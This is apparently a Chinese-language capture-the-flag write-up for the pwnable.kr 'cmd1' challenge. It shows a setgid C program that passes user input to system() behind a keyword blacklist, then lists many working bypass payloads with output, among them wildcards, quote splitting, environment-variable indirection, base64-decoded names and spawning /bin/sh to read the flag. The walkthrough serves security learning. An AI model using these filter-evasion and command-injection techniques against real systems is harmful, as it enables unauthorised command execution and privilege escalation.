cmd1 - 1 pt
Mommy! what is PATH environment in Linux?
ssh [email protected] -p2222 (pw:guest)
登陸伺服器之後,cmd1有cmd1_pwn的group權限,可以讀flag。
[email protected]:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14 2015 cmd1
-rw-r--r-- 1 root root 320 Mar 23 2018 cmd1.c
-r--r----- 1 root cmd1_pwn 48 Jul 14 2015 flag
本關的代碼量不是很大,直接看源碼吧。
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/thankyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
給r複制時的反彙編如下:
call _strstr
test rax, rax ;// 判斷傳回值是否為,影響ZF标志位
setnz al ;// set if not zero,如果ZF為1,al為0。如果ZF為1,al為1。
movzx eax, al ;// 16位擴充為32位,movzx無符号擴充。movsx為有符号擴充
add [rbp+var_4], eax ;// 修改r的值
strstr是Standard C Library中的函數,看一下實作。
SYNOPSIS
#include <string.h>
char * strstr(const char *haystack, const char *needle);
DESCRIPTION
The strstr() function locates the first occurrence of the null-terminated string needle in the null-terminated string haystack.
RETURN VALUES
If needle is an empty string, haystack is returned; if needle occurs nowhere in haystack,NULL is returned; otherwise a pointer to the first character of the first occurrence of needle is returned.
如果needle為空字元串,strstr傳回haystack。如果needle沒有出現,傳回NULL。否則傳回第一次比對到的子串。
本關調用putenv修改了環境變量PATH,是以原先的指令需要用絕對路徑去運作,或者export PATH恢複再使用。此外,filter了argv[1],不能出現flag sh tmp這些字元串。最後調用system執行。本關很明顯是要讓我們找一些bypass方案了。
flag
總結了一下目前的拿flag姿勢。
# 通配符 cat fla* 可以讀flag
[email protected]:~$ ./cmd1 /b"in/cat /home/cmd1/fla*"
mommy now I get what PATH environment is for :)
# 字元串拼接 'f'la'g' 在bash中還是flag
[email protected]:~$ echo 'f'la'g'
flag
[email protected]:~$ ./cmd1 "/bin/cat /home/cmd1/'f'lag"
mommy now I get what PATH environment is for :)
[email protected]:~$ echo 'f'lag
flag
[email protected]:~$ echo "f"lag
flag
[email protected]:~$ ./cmd1 "/bin/cat /home/cmd1/\"f\"lag"
mommy now I get what PATH environment is for :)
# env設定環境變量拿flag
[email protected]:~$ env x='/bin/cat /home/cmd1/flag' ./cmd1 "\$x"
mommy now I get what PATH environment is for :)
#借助vim來打開檔案
./cmd1 /usr/bin/vim
:e flag
# 轉義一個不需要轉義的字元 如\a
[email protected]:~$ ./cmd1 "/bin/cat fl\ag"
mommy now I get what PATH environment is for :)
# base64 decode
[email protected]:~$ ./cmd1 '/bin/cat $(echo "ZmxhZwo=" | /usr/bin/base64 -d)'
mommy now I get what PATH environment is for :)
# 直接寫bash,簡單粗暴 by v4r4n
[email protected]:~$ echo /bin/cat /home/cmd1/flag > /var/lib/php/sessions/asd
[email protected]:~$ chmod +x /var/lib/php/sessions/asd
[email protected]:~$ ./cmd1 /var/lib/php/sessions/asd
mommy now I get what PATH environment is for :)
# more 檢視目前目錄下所有檔案
./cmd1 "/bin/more *"
...
也有一個不太了解的。/bin/sh有cmd1_pwn權限,/bin/bash沒有。
[email protected]:~$ ./cmd1 "/bin/bas''h"
bash-4.3$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) groups=1025(cmd1)
bash-4.3$ exit
exit
[email protected]:~$ ./cmd1 "/bin/s''h"
$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) egid=1026(cmd1_pwn) groups=1026(cmd1_pwn),1025(cmd1)
$ /bin/cat flag
mommy now I get what PATH environment is for :)